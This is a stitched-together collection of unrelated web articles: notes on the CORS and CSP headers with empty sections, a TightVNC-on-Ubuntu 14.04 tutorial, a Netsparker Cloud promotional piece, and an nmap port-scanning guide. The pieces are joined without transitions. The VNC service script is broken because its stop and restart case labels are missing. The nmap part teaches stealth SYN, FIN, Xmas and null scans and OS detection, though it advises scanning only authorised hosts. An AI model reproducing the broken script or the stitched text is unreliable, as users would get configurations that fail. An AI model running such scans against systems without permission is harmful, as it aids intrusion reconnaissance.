Access-Control-Allow-Origin is apart of the Cross Origin Resource Sharing (CORS) specification. This header is used to determine which sites are allowed to access the resource by defining either a single origin or all sites (denoted by a wildcard value). It should be noted that if the resource has the wildcard value set, then the Access-Control-Allow-Credentials option will not be valid and the user-agent's cookies will not be sent in the request.

Valid Settings

  • * - Wildcard value allowing any remote resource to access the content of the resource which returned the Access-Control-Allow-Origin header.
  • http://www.example.com - A single serialized origin (http://[host], or https://[host]).

Common Invalid Settings

  • http://example.com, http://web2.example.com - Multiple serialized origins separated by a comma or space. Only a single origin is possible.
  • *.example.com - Wildcard subdomain origins defined such as: *.domain.com. Only a single origin is possible.
  • http://*.example.com - Same as above

How To Test

It is easy to determine if the header is configured properly because if it is not, the CORS request will simply fail to return any data.

External References


Content-Security-Policy 1.0

Purpose

Content Security Policy is a collection of directives which can be used to restrict how a page loads various resources. Currently, Internet Explorer only supports a subset of CSP and only with the X-Content-Security-Policy header. Chrome and Firefox currently support 1.0 of CSP, however version 1.1 of the policy is currently being developed. Configured properly it can help protect a site's resources from various attacks such as XSS and UI redressing related issues.
There are 10 possible directives which can each be configured to restrict when and how resources are loaded.
  • default-src - This directive sets defaults for script-src, object-src, style-src, img-src, media-src, frame-src, font-src and connect-src. If none of the previous directives exist in the policy the user-agent will enact the rules of the default-src values.
  • script-src - Also has two additional settings:
    • unsafe-inline - Allows the resource to execute script code. An example would be code that exists in an HTML element's on* event values, or the text content of a script element inside the protected resource.
    • unsafe-eval - Allows the resource to execute code dynamically in functions, such as eval, setTimeout, setInterval, new Function etc.
  • object-src - Determines where plugins can be loaded and executed from.
  • style-src - Determines where CSS or style markup can be loaded from.
  • img-src - Determines where images can be loaded from.
  • media-src - Determines where video or audio data can be loaded from.
  • frame-src - Determines where frames can be embedded from.
  • font-src - Determines where fonts can be loaded from.
  • connect-src - Restricts which resources can be used in XMLHttpRequest, WebSocket and EventSource.
  • sandbox - An optional directive which specifies a sandbox policy for 'safely' embedding content into a sandbox.
There is also the report-uri directive which can be used to send reports when the policy is violated to a specified URL. This can be helpful for both debugging and being notified of an attack.
Additionally, a second header of Content-Security-Policy-Report-Only can be defined to not enforce CSP but to send potential violations to a report URL. It follows the same syntax and rules as the Content-Security-Policy header.

Valid Settings

Common Invalid Settings

How To Test

Open the developer panel and view the console in Chrome or Firefox to view any potential violations while debugging a site.

External References

Install and Configure VNC on Ubuntu 14.04

Introduction

VNC, or "Virtual Network Computing", is a connection system that allows you to use your keyboard and mouse to interact with a graphical desktop environment on a remote server. VNC makes managing files, software, and settings on a remote server easier for users who are not yet comfortable with working with the command line.
In this guide, we will be setting up VNC on an Ubuntu 14.04 server and connecting to it securely through an SSH tunnel. The VNC server we will be using is TightVNC, a fast and lightweight remote control package. This choice will ensure that our VNC connection will be smooth and stable even on slower Internet connections.

Step One — Install Desktop Environment and VNC Server

By default, most Linux server installations will not come with a graphical desktop environment. If this is the case, we'll need to begin by installing one that we can work with. In this example, we will install XFCE4, which is very lightweight while still being familiar to most users.
We can get the XFCE packages, along with the package for TightVNC, directly from Ubuntu's software repositories using apt:
sudo apt-get update
sudo apt-get install xfce4 xfce4-goodies tightvncserver
To complete the VNC server's initial configuration, use the vncserver command to set up a secure password:
vncserver
(After you set up your access password, you will be asked if you would like to enter a view-only password. Users who log in with the view-only password will not be able to control the VNC instance with their mouse or keyboard. This is a helpful option if you want to demonstrate something to other people using your VNC server.)
vncserver completes the installation of VNC by creating default configuration files and connection information for our server to use. With these packages installed, you are ready to configure your VNC server and graphical desktop.

Step Two — Configure VNC Server

First, we need to tell our VNC server what commands to perform when it starts up. These commands are located in a configuration file called xstartup. Our VNC server has an xstartup file preloaded already, but we need to use some different commands for our XFCE desktop.
When VNC is first set up, it launches a default server instance on port 5901. This port is called a display port, and is referred to by VNC as :1. VNC can launch multiple instances on other display ports, like :2, :3, etc. When working with VNC servers, remember that :X is a display port that refers to 5900+X.
Since we are going to be changing how our VNC servers are configured, we'll need to first stop the VNC server instance that is running on port 5901:
vncserver -kill :1
Before we begin configuring our new xstartup file, let's back up the original in case we need it later:
mv ~/.vnc/xstartup ~/.vnc/xstartup.bak
Now we can open a new xstartup file with nano:
nano ~/.vnc/xstartup
Insert these commands into the file so that they are performed automatically whenever you start or restart your VNC server:
#!/bin/bash
xrdb $HOME/.Xresources
startxfce4 &
The first command in the file, xrdb $HOME/.Xresources, tells VNC's GUI framework to read the server user's .Xresources file. .Xresources is where a user can make changes to certain settings of the graphical desktop, like terminal colors, cursor themes, and font rendering.
The second command simply tells the server to launch XFCE, which is where you will find all of the graphical software that you need to comfortably manage your server.
To ensure that the VNC server will be able to use this new startup file properly, we'll need to grant executable privileges to it:
sudo chmod +x ~/.vnc/xstartup

Step Three — Create a VNC Service File

To easily control our new VNC server, we should set it up as an Ubuntu service. This will allow us to start, stop, and restart our VNC server as needed.
First, open a new service file in /etc/init.d with nano:
sudo nano /etc/init.d/vncserver
The first block of data will be where we declare some common settings that VNC will be referring to a lot, like our username and the display resolution.
#!/bin/bash
PATH="$PATH:/usr/bin/"
export USER="user"
DISPLAY="1"
DEPTH="16"
GEOMETRY="1024x768"
OPTIONS="-depth ${DEPTH} -geometry ${GEOMETRY} :${DISPLAY} -localhost"
. /lib/lsb/init-functions
Be sure to replace user with the non-root user that you have set up, and change 1024x768 if you want to use another screen resolution for your virtual display.
Next, we can start inserting the command instructions that will allow us to manage the new service. The following block binds the command needed to start a VNC server, and feedback that it is being started, to the command keyword start.
case "$1" in
start)
log_action_begin_msg "Starting vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vncserver ${OPTIONS}"
;;
The next block creates the command keyword stop, which will immediately kill an existing VNC server instance.

log_action_begin_msg "Stopping vncserver for user '${USER}' on localhost:${DISPLAY}"
su ${USER} -c "/usr/bin/vncserver -kill :${DISPLAY}"
;;
The final block is for the command keyword restart, which is simply the two previous commands (stop and start) combined into one command.
$0 stop
$0 start
;;
esac
exit 0
Once all of those blocks are in your service script, you can save and close that file. Make this service script executable, so that you can use the commands that you just set up:
sudo chmod +x /etc/init.d/vncserver
Now try using the service and command to start a new VNC server instance:
sudo service vncserver start

Step Four — Connect to Your VNC Desktop

To test your VNC server, you'll need to use a client that supports VNC connections over SSH tunnels. If you are using Windows, you could use TightVNC, RealVNC, or UltraVNC. Mac OS X users can use the built-in Screen Sharing, or can use a cross-platform app like RealVNC.
First, we need to create an SSH connection on your local computer that securely forwards to the localhost connection for VNC. You can do this via the terminal on Linux or OS X via the following command:
(Remember to replace user and server_ip_address with the username and IP you used to connect to your server via SSH.)
ssh -L 5901:127.0.0.1:5901 -N -f -l user server_ip_address
If you are using a graphical SSH client, like PuTTY, use server_ip_address as the connection IP, and set localhost:5901 as a new forwarded port in the program's SSH tunnel settings.
Next, you can use your VNC viewer to connect to the VNC server at localhost:5901. Make sure you don't forget that :5901 at the end, as that is the only port that the VNC instance is accessible from.
Once you are connected, you should see the default XFCE desktop ready for configuration and use! It should look something like this:

Once you have verified that the VNC connection is working, add your VNC service to the default services, so that it will automatically start whenever you boot your server:
sudo update-rc.d vncserver defaults

Netsparker Cloud Online Security Scanner

Netsparker announced that their new online web application security service offering Netsparker Cloud is in its final stages of development and is available in BETA. This means that you can now apply for a free trial of Netsparker Cloud and check out all the new features to see how your business can benefit from them.

What is Netsparker Cloud?

As the name implies, Netsparker Cloud is a cloud based web application security and vulnerability scanner that any organization can use to scan websites and uncover any vulnerabilities and security flaws that could leave them and the business exposed to malicious attacks.
Netsparker Cloud is not just the next ordinary online scanner to hit the news. It has a number of enterprise level features which are specifically built to help large organizations, who have hundreds and even thousands of website ensure the security of all their websites in an easy and manageable way. And it is not just about the features; there is no doubt that the Netsparker Cloud scanning engine is one of the best out there because it is built around the already proven scanning engine of Netsparker Web Application Security Scanner.

A Bit of Netsparker History

For those of you who are not familiar with Netsparker and their web security scanner, Netsparker is a very young company. Most probably the youngest in the web application security industry but don’t under estimate it. The first version of Netsparker was released in early 2010. Since then Netsparker have taken great strides and their scanner have been continuously improving. In fact nowadays Netsparker Web Application Security Scanner is considered to be one of the market leaders in the industry. Its leading performance in terms of crawling capabilities and vulnerability detection is clearly shown in the latest independent web application security scanner comparison conducted by security expert Shay Chan, where Netsparker smoked the competition and lead the field, matching the performance of scanners that cost at least four times as much.
Apart from leading the field by being the scanner which identified most vulnerabilities, Netsparker also has its own unique cutting edge technology; automatic exploitation of vulnerabilities. What does this mean to you? It means that Netsparker is the first, and until now the only web application security scanner that does not report any false positives. And why should this be important to you?
Well it is very important, let me explain why. It is a well known fact that automated security tools generate a lot of false positives. Therefore users spend countless amount of hours verifying the scanner’s result to check which of the reported vulnerabilities are true or not. From the business, financial and operations point of views this does not make sense. I mean what is the use of having an automated tool when you have to manually verify it’s results? It defeats the whole scope of automation. Actually it raises the budget costs and hinders the process of securing web applications, not to mention that it actually leads to leaving a lot of vulnerabilities unchecked, as explained in False Positives The problem of false positives in web application security and how to tackle them.

A Deeper Look Into Netsparker Cloud

The Obvious, Scalability – Scan as Much as You Want When You Want

I won’t ramble much about this, but it is always worth a mention. There are a number of advantages that large organizations can leverage when using a cloud based products such as Netsparker Cloud. The most relevant is scalability. Large organizations have hundreds and thousands of web applications, and scanning them all and ensuring that none of them have any security flaws can be a bit of a nightmare, to say the least.
In fact many try to build their own inhouse web scanning solution but most of them fail because they are very difficult to maintain, do not scale well and are not as good as off the shelf scanners at detecting vulnerabilities. On the other hand with Netsparker Cloud large organizations can scan as much websites as they want when they want without hassling with on-premise software licenses or hardware on which to run it.

Always Up to Date

Imagine a new vulnerability is being exploited in the wild, like we have seen lately with Heartbleed and Shellshock. If your organization have their own in house solution, first a security check has to be developed, then tested and then implemented for the scanners to use. If you are using on-premise scanning software, you have to update all of the running instances prior to scanning all your websites. This might not be an issue if you have a few installations but if you are scanning hundreds and thousands of sites, then most probably you have quite a few installations. Updating a good number of installs is definitely not the way to go, because again it consumes a lot of resources and time.
On the other hand Netsparker Cloud is always up to date. As soon as a vulnerability is making headlines Netsparker’s engineers would have already added the security checks for it in Netsparker Cloud, so all you have to do is login and launch the security scans and if you are using groups, then this should be just a quick 1 minute job.

Multi User Environment

This is another must have enterprise feature; Netsparker Cloud multi user support. When you subscribe for a Netsparker Cloud account, you can create as much users as you want within that account. You can assign different privileges to each user, for example one can only view the scan results, one can launch security scans only and another can add new websites to Netsparker Cloud account.
This means that everyone involved in the process of securing web applications, including managers, supervisors, developers, testers and even consultants can login and do the job without the need to wait for instructions, hence ensuring any security issues are immediately remediated.

API and SDLC Integration

Netsparker Cloud also has an API that allows developers to configure new scans, modify existing scans, launch new scans and do almost anything else through it. Therefore integrating web application security scanning in your SDLC is not just possible now, but also very easy to do. There are several benefits to Integrating web application security scans throughout every stage of the SDLC.
For example when security is considered and thought for at every stage of the development of a website, you do not only have a more secure website but addressing security issues is much easier. When security is not thought for at the early stages of development, remediating vulnerabilities might be too costly if not impossible because the fundamentals of the design do not cater for such fixes.

Better Management of Your Web Application Security Program

Scanning websites and generating reports is one thing, but consolidating all the information and using it to remediate security flaws and improve the security of all the websites in a timely manner is another. When you use Netsparker Cloud all your web application security reports and data are centralized and can be easily accessible by all the team members, thanks to the multi user support. Hence developers can start remediating security flaws as soon as the scans are ready without the need to wait for the reports to pass through all the bureaucratic procedures.
Managers can also get an overview of the security state of all websites in their organizations through the different number of reports Netsparker Cloud has available. For example they can get an overview of a specific website from the website dashboard, where a number of graphs highlight the number and type of vulnerabilities identified on the website, as highlighted in the below screenshot.

Of course there are also developer reports which include extensive amount of details about each detected vulnerability including the vulnerable parameter, the payload used for testing and practical information on how to remediate the vulnerability.

There are also the correlated trending reports, which not only enable managers to get an overview of the current state of security of a website, but how it also evolved. Trending reports also allow managers to keep an eye on the performance of each developer because they highlight the changes in vulnerabilities throughout a number of scans. For example from such reports you can get an idea of when a vulnerability was identified for the first time in the web application, when it was fixed, when and if it reappeared again etc.


Netsparker Cloud is a Fully Configurable Scanner

One common problem users are wary of when using a cloud based product is lack of flexibility in terms of configuration. For example when comparing the online and on-premise editions of a particular software, the cloud based edition is typically very limited in terms of configuration and flexibility, mostly because many of the features were not ported. This is not the case with Netsparker Cloud; what can be configured in the scanner that is installed on computers, can be configured in its online counterpart Netsparker Cloud.

Netsparker Cloud Free Trial

There are many other neat features that make Netsparker Cloud an ideal solution for organizations of any size but it is not possible to mention them all in this article. Hence I recommend you to check out all the features for yourself and see how much your organization can benefit and save in terms of budget when using Netsparker Cloud. Start today and apply for a free Netsparker Cloud trial.

Summary – Cloudy Days Help Organizations Have More Secure Websites!

As we have just seen, organizations can benefit a lot when using Netsparker Cloud. Having said that we do not mean that on-premise software such as Netsparker Web Application Security Scanner is of no use anymore, actually there is still a lot of place for such software in the web application security ecosystem. It all depends on what your requirements are.
If you only have a few websites and a one man or small team, or if you frequently do penetration tests on the premises of your customers,  most of the time Netsparker Web Application Security Scanner is your tool of choice. On the other hand, if your hair is falling off because you cannot cope with the stress of managing the security of hundreds and thousands of web applications, then of course Netsparker Cloud is the way to go since it has got a good number of features that you can leverage to ease your daily job and ensure the security of all websites in your organization. Netsparker Cloud is also available as an on-premise solution, thus allowing you to also scan websites and portals that are only accessible from inside your network.

Nmap Scanning basics

Introduction

Networking is an expansive and overwhelming topic for many budding system administrators. There are various layers, protocols, and interfaces, and many tools and utilities that must be mastered to understand them.
This guide will cover the concept of "ports" and will demonstrate how the nmap program can be used to get information about the state of a machine's ports on a network.

What Are Ports?

There are many layers in the OSI networking model. The transport layer is the layer primarily concerned with the communication between different services and applications.
This layer is the main layer that ports are associated with.

Port Terminology

Some knowledge of terminology is needed to understand port configuration. Here are some terms that will help you understand the discussion that will follow:
  • Port: An addressable network location implemented inside of the operating system that helps distinguish traffic destined for different applications or services.
  • Internet Sockets: A file descriptor that specifies an IP address and an associated port number, as well as the transfer protocol that will be used to handle the data.
  • Binding: The process that takes place when an application or service uses an internet socket to handle the data it is inputting and outputting.
  • Listening: A service is said to be "listening" on a port when it is binding to a port/protocol/IP address combination in order to wait for requests from clients of the service.
    Upon receiving a request, it then establishes a connection with the client (when appropriate) using the same port it has been listening on. Because the internet sockets used are associated with a specific client IP address, this does not prevent the server from listening for and serving requests to other clients simultaneously.
  • Port Scanning: Port scanning is the process of attempting to connect to a number of sequential ports, for the purpose of acquiring information about which are open and what services and operating system are behind them.

Common Ports

Ports are specified by a number ranging from 1 to 65535.
  • Many ports below 1024 are associated with services that Linux and Unix-like operating systems consider critical to essential network functions, so you must have root privileges to assign services to them.
  • Ports between 1024 and 49151 are considered "registered". This means that they can be "reserved" (in a very loose sense of the word) for certain services by issuing a request to the IANA (Internet Assigned Numbers Authority). They are not strictly enforced, but they can give a clue as to the possible services running on a certain port.
  • Ports between 49152 and 65535 cannot be registered and are suggested for private use.
Because of the vast number of available ports, you won't ever have to be concerned with the majority of the services that tend to bind to specific ports.
However, there are some ports that are worth knowing due to their ubiquity. The following is only a very incomplete list:
  • 20: FTP data
  • 21: FTP control port
  • 22: SSH
  • 23: Telnet <= Insecure, not recommended for most uses
  • 25: SMTP
  • 43: WHOIS protocol
  • 53: DNS services
  • 67: DHCP server port
  • 68: DHCP client port
  • 80: HTTP traffic <= Normal web traffic
  • 110: POP3 mail port
  • 113: Ident authentication services on IRC networks
  • 143: IMAP mail port
  • 161: SNMP
  • 194: IRC
  • 389: LDAP port
  • 443: HTTPS <= Secure web traffic
  • 587: SMTP <= message submission port
  • 631: CUPS printing daemon port
  • 666: DOOM <= This legacy FPS game actually has its own special port
These are just a few of the services commonly associated with ports. You should be able to find the appropriate ports for the applications you are trying to configure within their respective documentation.
Most services can be configured to use ports other than the default, but you must ensure that both the client and server are configured to use a non-standard port.
You can get a short list of some common ports by typing:
less /etc/services
It will give you a list of common ports and their associated services:
. . .
tcpmux          1/tcp                           # TCP port service multiplexer
echo            7/tcp
echo            7/udp
discard         9/tcp           sink null
discard         9/udp           sink null
systat          11/tcp          users
daytime         13/tcp
daytime         13/udp
netstat         15/tcp
qotd            17/tcp          quote
msp             18/tcp                          # message send protocol
. . .
We will see in the section about nmap how to get a more complete list.

How To Check Your Own Open Ports

There are a number of tools that can be used to scan for open ports.
One that is installed by default on most Linux distributions is netstat.
You can quickly discover which services you are running by issuing the command with the following parameters:
sudo netstat -plunt
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      785/sshd        
tcp6       0      0 :::22                   :::*                    LISTEN      785/sshd 
This shows the port and listening socket associated with the service and lists both UDP and TCP protocols.

How To Scan Ports with Nmap

Nmap can reveal a lot of information about a host. It can also make system administrators of the target system think that someone has malicious intent. For this reason, only test it on servers that you own or in situations where you've notified the owners.
The nmap creators actually provide a test server located at:
scanme.nmap.org
This, or your own VPS instances are good targets for practicing nmap.
Here are some common operations that can be performed with nmap. We will run them all with sudo privileges to avoid returning partial results for some queries. Some commands may take a long while to complete:
Scan for the host operating system:
sudo nmap -O remote_host
Skip network discovery portion and assume the host is online. This is useful if you get a reply that says "Note: Host seems down" in your other tests. Add this to the other options:
sudo nmap -PN remote_host
Specify a range with "-" or "/24" to scan a number of hosts at once:
sudo nmap -PN xxx.xxx.xxx.xxx-yyy
Scan a network range for available services:
sudo nmap -sP network_address_range
Scan without preforming a reverse DNS lookup on the IP address specified. This should speed up your results in most cases:
sudo nmap -n remote_host
Scan a specific port instead of all common ports:
sudo nmap -p port_number remote_host
To scan for TCP connections, nmap can perform a 3-way handshake (explained below), with the targeted port. Execute it like this:
sudo nmap -sT remote_host
To scan for UDP connections, type:
sudo nmap -sU remote_host
Scan for every TCP and UDP open port:
sudo nmap -n -PN -sT -sU -p- remote_host
A TCP "SYN" scan exploits the way that TCP establishes a connection.
To start a TCP connection, the requesting end sends a "synchronize request" packet to the server. The server then sends a "synchronize acknowledgment" packet back. The original sender then sends back an "acknowledgment" packet back to the server, and a connection is established.
A "SYN" scan, however, drops the connection when the first packet is returned from the server. This is called a "half-open" scan and used to be promoted as a way to surreptitiously scan for ports, since the application associated with that port would not receive the traffic, because the connection is never completed.
This is no longer considered stealthy with the adoption of more advanced firewalls and the flagging of incomplete SYN request in many configurations.
To perform a SYN scan, execute:
sudo nmap -sS remote_host
A more stealthy approach is sending invalid TCP headers, which, if the host conforms to the TCP specifications, should send a packet back if that port is closed. This will work on non-Windows based servers.
You can use the "-sF", "-sX", or "-sN" flags. They all will produce the response we are looking for:
sudo nmap -PN -p port_number -sN remote_host
To see what version of a service is running on the host, you can try this command. It tries to determine the service and version by testing different responses from the server:
sudo nmap -PN -p port_number -sV remote_host
There are many other command combinations that you can use, but this should get you started on exploring your networking vulnerabilities.